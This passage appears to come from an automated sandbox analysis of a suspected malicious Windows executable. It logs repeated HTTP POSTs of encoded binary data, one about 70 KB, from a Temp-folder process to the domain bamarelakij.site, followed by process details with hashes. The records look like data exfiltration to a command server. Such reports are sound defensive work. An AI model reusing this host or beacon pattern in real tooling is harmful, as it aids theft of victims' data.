                                                                                                                                                                Data Ascii: ^mX{\[C7#3Z5O,zSo5/-fD7G'q;Nw\>|8Z;QpM-Kd[^~j[/dw>\6z74~7E7{Why}woc6{eg+37P{sFlf[Z97,[-Kg9|7'}&ZlO7go3
                                                                                                                                                                2025-01-09 13:43:09 UTC731INHTTP/1.1 204 No Content
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:43:09 GMT
                                                                                                                                                                Connection: close
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tFymu3iIrPd5ACL0WLxlIgzR8%2FTHdEyQLmhVgORpADIzxi0KlxwpWyxaYnI3ePJIMZX4lSgSub9ac3PRnxgVSKEshM%2B7SQBGP9SVnVKmr7Wey2U9foySNrNA5ObDkG%2F1MAq0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8ff4dac9ce4eef9f-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1761&rtt_var=672&sent=52&recv=140&lost=0&retrans=0&sent_bytes=2839&recv_bytes=134176&delivery_rate=1613259&cwnd=219&unsent_bytes=0&cid=3ed609e07b8bb222&ts=561&x=0"


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                26192.168.2.750092104.21.80.524433824C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:43:10 UTC435OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept: */*
                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
                                                                                                                                                                Content-Length: 745
                                                                                                                                                                Host: bamarelakij.site
                                                                                                                                                                2025-01-09 13:43:10 UTC745OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 95 00 00 00 c0 48 22 25 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 06 00 00 00 81 90 44 4a 00 00 00 00 25 81 21 00 00 00 00 c4 00 00 00 81 90 44 4a 00 00 00 00 a0 96 0c 0c 58 00 00 00 00 00 00 00 5a 00 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 96 0c 0e 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 a0 96 0a 0c 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0f 00 00 00 a7 00 00 00 84 03 ce 1a 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 2a 00 00 00 09 06 9d 34 00 00 00 00 25 81 25 2b 81 04 02 47 25 81 00 41 2b 81 02 02 47 25 81 00 41 00 00
                                                                                                                                                                Data Ascii: H"%G6DJ%!DJXZZG6*4%%+G%A+G%A
                                                                                                                                                                2025-01-09 13:43:10 UTC729INHTTP/1.1 204 No Content
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:43:10 GMT
                                                                                                                                                                Connection: close
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZJ9lClkeREZ%2FTMYZLt5ZGSNWTuguAqpfcwk7idz2v%2FQY2VFXv3El99gf6FIkpNAJ8Vz%2Bzcf5XQswO%2BuWdJcgLLMMgejvJFXy82MGnYB221JmOMVN1tXIH64FG%2FM9HkiPigHG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8ff4dad068471875-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1657&min_rtt=1657&rtt_var=828&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4216&recv_bytes=1816&delivery_rate=314079&cwnd=153&unsent_bytes=0&cid=848c10e941978e29&ts=474&x=0"


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                27192.168.2.750093104.21.80.524433824C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:43:10 UTC435OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept: */*
                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
                                                                                                                                                                Content-Length: 212
                                                                                                                                                                Host: bamarelakij.site
                                                                                                                                                                2025-01-09 13:43:10 UTC212OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 99 00 00 00 70 0b 5f 20 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 0e 00 00 00 e0 16 be 40 00 00 00 00 27 81 81 25 81 23 00 00 00 00 00 c4 00 00 00 e0 16 be 40 00 00 00 00 a0 96 0c 0c 58 00 00 00 00 00 00 00 5a 00 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 96 0c 0e 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 a0 96 0a 0c 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                Data Ascii: p_ G6@'%#@XZZ
                                                                                                                                                                2025-01-09 13:43:11 UTC731INHTTP/1.1 204 No Content
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:43:11 GMT
                                                                                                                                                                Connection: close
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LzV5ts2nild6pwNOyA%2FAaOaLUtTqg1%2FgyhtKQaHMgUiBOFgnmzTHsfnBj60DVBd%2FjASV7RiJ9K8OgP12soqn3982lrpjeKjh%2BUgoUgaM%2FrVaYY5OcFh7GoOYNkYmJolB%2BPSO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8ff4dad629bc0c7c-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1603&rtt_var=625&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1283&delivery_rate=1716637&cwnd=76&unsent_bytes=0&cid=de39bfd61285a511&ts=323&x=0"


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                28192.168.2.750094104.21.80.524433824C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:43:11 UTC435OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept: */*
                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
                                                                                                                                                                Content-Length: 380
                                                                                                                                                                Host: bamarelakij.site
                                                                                                                                                                2025-01-09 13:43:11 UTC380OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 95 00 00 00 1e 5a f7 29 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 06 00 00 00 3c b4 ef 52 00 00 00 00 25 81 21 00 00 00 00 c4 00 00 00 3c b4 ef 52 00 00 00 00 a0 96 0c 0c 58 00 00 00 00 00 00 00 5a 00 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 96 0c 0e 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 a0 96 0a 0c 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 0f 00 00 00 94 00 00 00 13 6a 2a 23 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 04 00 00 00 26 d4 54 46 00 00 00 00 23 21 00 00 00 00 c4 00 00 00 26 d4 54 46 00 00 00 00 a0 96 0c 0c 58
                                                                                                                                                                Data Ascii: Z)G6<R%!<RXZZj*#G6&TF#!&TFX
                                                                                                                                                                2025-01-09 13:43:12 UTC728INHTTP/1.1 204 No Content
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:43:12 GMT
                                                                                                                                                                Connection: close
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OyGednSjdHpZvxu2o28tozTPiDJrwYkeLGHeVGE0LSC1RoZrn0g8iBWGOYd7UmWnznehl%2BZV%2BjN%2F0F2GHp261uRVxDfkSB5m%2F5f1wCfu8Hhh5Gx1Otxm8OinbfVTwruZBCdk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8ff4dadb29447287-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1871&min_rtt=1867&rtt_var=709&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1451&delivery_rate=1533613&cwnd=191&unsent_bytes=0&cid=9bcc5ce941c65cfb&ts=338&x=0"


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                29192.168.2.750095104.21.80.524433824C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:43:12 UTC436OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept: */*
                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
                                                                                                                                                                Content-Length: 9953
                                                                                                                                                                Host: bamarelakij.site
                                                                                                                                                                2025-01-09 13:43:12 UTC9953OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 a6 26 00 00 eb bf 07 33 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 08 00 00 00 d7 7f 0e 66 00 00 00 00 27 81 00 21 00 00 00 00 e4 4c 00 00 d7 7f 0e 66 00 00 00 00 a0 96 06 08 5a 00 00 10 10 00 3e 56 92 b2 a4 c7 1a b9 ff ff ff ff ff ff ff ff 34 00 28 00 8e e4 c2 c4 c4 ca e4 b8 c8 ca e6 b8 82 a2 a4 8c 8a ac a4 a8 8e 98 5c d4 e0 ce 02 00 20 00 04 08 00 00 00 00 00 00 0e 08 00 00 00 00 00 00 02 04 08 fb f7 82 a2 a4 8c 8a ac a4 a8 8e 98 a4 a0 9c ac aa 9a 82 9a 90 a8 b2 8a a8 8a ac 8e 88 8a 9c 90 8a 90 b4 88 82 a2 a4 b0 b4 a2 86 88 90 90 98 a8 aa b4 92 8a 94 a4 86 a2 8e 8e a0 a4 a2 ae 84 92 b2 ae 82 88 ae 94 8a b4 a8 82 8a 98 8a a4 96 b4 aa 88 b4 94 90 a6 8c ac 92 aa a0 84 a8 94 ac 8e 96
                                                                                                                                                                Data Ascii: &3G6f'!LfZ>V4(\
                                                                                                                                                                2025-01-09 13:43:12 UTC734INHTTP/1.1 204 No Content
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:43:12 GMT
                                                                                                                                                                Connection: close
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yhv5PbCvVP%2FJ5eaxO4ykjhR%2B7Qch4R9sZ9pl%2Bhdm3OmOj51LV9s9QKSvaW7ls73agaVkvaVzmf1TwkRFFiv0tz16M%2FG%2BINL6o4%2F6yhMUGCLETPKlh953rXreJIwOd3mjK50J"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8ff4dae02bd57c78-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1790&rtt_var=682&sent=8&recv=15&lost=0&retrans=0&sent_bytes=2838&recv_bytes=11047&delivery_rate=1593016&cwnd=252&unsent_bytes=0&cid=f2b0225bdc20e713&ts=346&x=0"


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                30192.168.2.750096104.21.80.524433824C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:43:13 UTC437OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept: */*
                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
                                                                                                                                                                Content-Length: 70017
                                                                                                                                                                Host: bamarelakij.site
                                                                                                                                                                2025-01-09 13:43:13 UTC15331OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 46 11 01 00 54 2f 9d 2d 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 61 20 00 00 a8 5e 3b 5a 00 00 00 00 37 81 4d 66 6e 6c 68 70 66 53 cc e4 de dc e8 c8 ca e6 d6 27 14 00 9b 94 ca 23 25 9b 0a 00 9b 08 00 9f 00 00 00 02 ff e9 00 00 b3 4c 92 dc e8 ca d8 50 a4 52 40 86 de e4 ca 50 a8 9a 52 64 40 86 a0 aa 40 6c 6c 60 60 40 80 40 64 5c 68 60 40 8e 90 f4 23 7f 9a d2 c6 e4 de e6 de cc e8 40 84 c2 e6 d2 c6 40 88 d2 e6 e0 d8 c2 f2 40 82 c8 c2 e0 e8 ca e4 81 87 b9 00 a3 41 4d a6 f2 e6 e8 ca da 51 a4 ca ce d2 e6 e8 e4 f2 51 e6 da e6 e6 5c ca f0 ca 53 c6 e6 e4 e6 e6 5c ca f0 ca 57 ee d2 dc d2 dc d2 e8 5c ca f0 ca 53 c6 e6 e4 e6 e6 5c ca f0 ca 59 ee d2 dc d8 de ce de dc 5c ca f0 ca 59 e6 ca e4 ec
                                                                                                                                                                Data Ascii: FT/-G6a ^;Z7MfnlhpfS'#%LPR@PRd@@ll``@@d\h`@#@@@AMQQ\S\W\S\Y\Y
                                                                                                                                                                2025-01-09 13:43:13 UTC15331OUTData Raw: 69 42 65 85 47 f4 ee a0 46 5a dd d6 a5 db 15 ae 9b 01 f7 21 ad a5 10 50 f2 c1 59 ef 89 f6 6f a9 a9 be 5a 81 63 17 6b 7c 75 bf b0 ed 02 a7 37 6c 19 2e ae cf 13 35 a7 63 c3 e6 6a 19 6a dd b9 27 ee 57 b0 9e 89 be 97 9b 8d 8b b7 15 41 03 5e 95 07 32 0f d3 a4 8b b6 04 02 b8 a2 60 4d dd 5f 38 38 f8 ee 7d b9 3c 2d 4d 1a 2d 6f a2 14 88 06 ea 87 1f 25 4f b4 d9 72 1c 22 a7 3a 29 7a 21 b6 bf 3a 0d de a6 25 f3 66 41 d4 5a 91 f7 4e 20 61 2e a0 0f 8b 83 e3 4f dd b4 44 5d dd 85 fa b1 ea c8 49 c3 92 47 1f 9a 38 cb 21 6b ce ad fb 16 6a 99 f8 82 bd e2 e8 08 2b 5a 05 01 94 d2 5e 5f 13 c8 a1 14 f8 da 9a c5 95 43 c7 f1 61 67 3d fd 92 20 5f 80 00 6a 68 85 3e b1 06 16 f0 23 2d c7 ac e0 21 bc 05 2d 89 a2 0c ab ef 91 1a 75 75 bd e1 9f fb 15 fb 13 52 9c 02 56 4c 1c 7f 12 d9 4c 32
                                                                                                                                                                Data Ascii: iBeGFZ!PYoZck|u7l.5cjj'WA^2`M_88}<-M-o%Or":)z!:%fAZN a.OD]IG8!kj+Z^_Cag= _jh>#-!-uuRVLL2
                                                                                                                                                                2025-01-09 13:43:13 UTC15331OUTData Raw: e1 9c db 20 49 67 b0 fc 86 fc f0 cd 40 be c8 80 01 c2 3c 1a f8 64 7f 24 7f 9c da 6c 78 e6 21 79 cc 77 1f 08 28 cf 96 1e 81 76 68 4e 22 18 46 ae 77 75 ef 7f 3d 1a 06 c2 bf c0 d7 bb ab ce d9 19 9d 25 2b 15 cf de 7c b5 8f 0b 37 34 52 7b b2 17 be 8a 90 18 43 b4 9e 2e 62 3f 6f 5c 52 8e 17 67 af 1d 81 7d 4f 3d b1 39 01 60 08 6e 81 1a 6a 8b 49 46 25 86 ce cd 4e a0 a9 8d 15 a9 aa de ad b8 5c 4d 7a e4 07 8e d0 41 a0 f2 7f e6 3e 19 d3 23 fe 6d 59 25 fe 6d f9 ad 20 ed 32 54 b7 f2 05 d7 8b e9 3a 1a 19 4e 6f b7 d8 d0 24 d9 39 c4 bf 5e 9e 81 ea 62 76 d3 e6 62 76 d3 76 db 8c 00 cc a2 51 dd c9 6c 68 c0 bd 77 46 ce 1d 22 4f 7d 0e 13 a6 b1 c7 ce 0c c2 60 09 15 5e dc d7 9c d9 c8 e5 93 04 f8 da d4 5d c4 53 77 d3 ba c0 19 70 9b c6 1b 72 ad a8 8a 8a 52 c5 db 61 3d 40 9c e2 6d
                                                                                                                                                                Data Ascii: Ig@<d$lx!yw(vhN"Fwu=%+|74R{C.b?o\Rg}O=9`njIF%N\MzA>#mY%m 2T:No$9^bvbvvQlhwF"O}`^]SwprRa=@m
                                                                                                                                                                2025-01-09 13:43:13 UTC15331OUTData Raw: 52 c3 b1 0b bd 6b ce 0b df 69 8f c5 6a 04 b3 c4 d1 d6 18 31 5d 38 3c 60 15 ce b5 39 84 bb f3 8e 21 38 65 ba 48 53 99 8b c3 75 92 64 1d 6e e8 e8 76 e3 b1 be 70 9f c9 b3 1b 01 e5 a6 37 5b bf 30 93 35 72 d7 d7 7b d2 e1 c8 f1 b9 7f 2d d9 39 b8 d3 5e 48 7f f9 4c 22 de a2 74 9f bd f3 61 fc 74 b6 0b 84 fb a6 e3 d7 8e bf 75 dd ec 5a e7 40 b3 de c6 0e e3 bc cf 9a 31 93 a6 cb cb a6 93 2d a1 c3 b0 65 56 98 54 6f 45 d0 38 59 30 3b be a2 d7 2d 39 7d 97 d9 19 0c 15 31 56 dd 37 24 0a ee 28 78 1c 5a 8f 56 27 d1 86 a5 68 12 44 a4 16 f5 a3 80 02 e2 d3 36 8e 8a e0 da c9 a5 ba 7e fc d9 1b da 53 27 e8 b4 ef 43 0a 43 c9 a9 75 c3 df 56 cd f2 d9 07 9b a2 7d ed db c6 e5 eb 7a 1e 9b 1f e6 b4 13 17 0f 54 e8 07 52 a1 01 9d a7 6f 49 c3 05 0b 69 cc 11 a1 33 cd 34 6b af 1c c6 dc 4e f8
                                                                                                                                                                Data Ascii: Rkij1]8<`9!8eHSudnvp7[05r{-9^HL"tatuZ@1-eVToE8Y0;-9}1V7$(xZV'hD6~S'CCuV}zTRoIi34kN
                                                                                                                                                                2025-01-09 13:43:13 UTC8693OUTData Raw: 68 92 62 29 44 c5 b5 86 18 61 5f 2f 52 ac 3c 3d f7 a6 9e 0f 4d 86 37 f7 b6 af a5 b2 7c cc 28 2e 3e 18 e2 f6 75 09 d4 b0 e0 9d 79 16 1f c1 13 61 22 79 7d ec 64 a9 52 8c 85 27 78 5a c8 9b 4a 4d 2d 48 d6 d2 7e c1 bf da 61 3c 82 ed 61 dc 94 c4 fa a4 ae 71 b2 bb 73 26 89 ff b0 88 13 87 4e 51 82 49 e3 37 46 eb e6 93 cf e2 e6 e2 d6 cc cb 0b 95 1c 22 06 08 dd 3f 49 85 bf fc 2a 8d bd e9 e1 d5 21 da 63 ec 2f 22 76 ac e3 3b f7 6c d8 be f0 2d 1d e9 10 5c 95 f6 57 b7 dc 24 61 90 d3 a7 83 56 58 8c e4 37 a6 8d 99 c9 a6 a4 b3 f6 56 47 0c 7b 01 7d 50 8f d6 07 d6 2f 39 e4 62 36 bf d6 b0 ee 66 fa 49 5a 60 bb e2 f4 99 a7 e5 4b 86 11 62 5e 7c 11 e6 5c bc 5b 01 d9 23 35 ca 81 3b df ae 5e 97 89 69 4a 60 88 d7 4f d6 38 9f b5 bd 32 30 ee 78 2b 63 78 64 b5 28 a2 c5 11 1c 50 2c af
                                                                                                                                                                Data Ascii: hb)Da_/R<=M7|(.>uya"y}dR'xZJM-H~a<aqs&NQI7F"?I*!c/"v;l-\W$aVX7VG{}P/9b6fIZ`Kb^|\[#5;^iJ`O820x+cxd(P,
                                                                                                                                                                2025-01-09 13:43:14 UTC733INHTTP/1.1 204 No Content
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:43:13 GMT
                                                                                                                                                                Connection: close
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eBZUJeNh5eRGf6vuI%2BDoUhJovCjz%2BCR8Z7JBt2P0BUQtvRm35Bd50xYIG8zVJ3wI5QBpyixZz%2FnxsZQ3y8H7iN21A4I5WR7ltgO2%2BIQRpDQFmBd3%2FOBctiVrytnFcxbCX2sA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8ff4dae5df06c477-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1798&min_rtt=1776&rtt_var=682&sent=29&recv=76&lost=0&retrans=0&sent_bytes=2837&recv_bytes=71288&delivery_rate=1644144&cwnd=181&unsent_bytes=0&cid=453d1a2fdcd818d1&ts=518&x=0"


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                31192.168.2.750097104.21.80.524433824C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:43:14 UTC434OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept: */*
                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
                                                                                                                                                                Content-Length: 35
                                                                                                                                                                Host: bamarelakij.site
                                                                                                                                                                2025-01-09 13:43:14 UTC35OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                Data Ascii:
                                                                                                                                                                2025-01-09 13:43:14 UTC724INHTTP/1.1 204 No Content
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:43:14 GMT
                                                                                                                                                                Connection: close
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L3zgWoAzF09VR6uikAmbZc9dWwc5ue8TbbCDxNLknrFCtHrZiyNqWbFXfi0RRKqOzX6QZ76SIZ5gr3iEZUnCzAPZYZoeHDCP3VqCWIhNb7QdYGPybMgqDAmBCZ%2FbgOQkSI3%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8ff4daec39c89e08-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1812&min_rtt=1809&rtt_var=684&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1105&delivery_rate=1592148&cwnd=163&unsent_bytes=0&cid=fe2673305668b541&ts=239&x=0"


                                                                                                                                                                Statistics

                                                                                                                                                                CPU Usage

                                                                                                                                                                Click to jump to process

                                                                                                                                                                Memory Usage

                                                                                                                                                                Click to jump to process

                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                Behavior

                                                                                                                                                                Click to jump to process

                                                                                                                                                                System Behavior

                                                                                                                                                                General

                                                                                                                                                                Target ID:1
                                                                                                                                                                Start time:08:41:29
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Users\user\Desktop\kXzODlqJak.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\Desktop\kXzODlqJak.exe"
                                                                                                                                                                Imagebase:0x910000
                                                                                                                                                                File size:14'323'584 bytes
                                                                                                                                                                MD5 hash:AB79EAFCCE0D6EFF856B259977E480E1
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:2
                                                                                                                                                                Start time:08:41:29
                                                                                                                                                                Start date:09/01/2025
                                                                                                                                                                Path:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Windows\TEMP\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe" -burn.clean.room="C:\Users\user\Desktop\kXzODlqJak.exe" -burn.filehandle.attached=648 -burn.filehandle.self=652
                                                                                                                                                                Imagebase:0x160000
                                                                                                                                                                File size:14'302'064 bytes
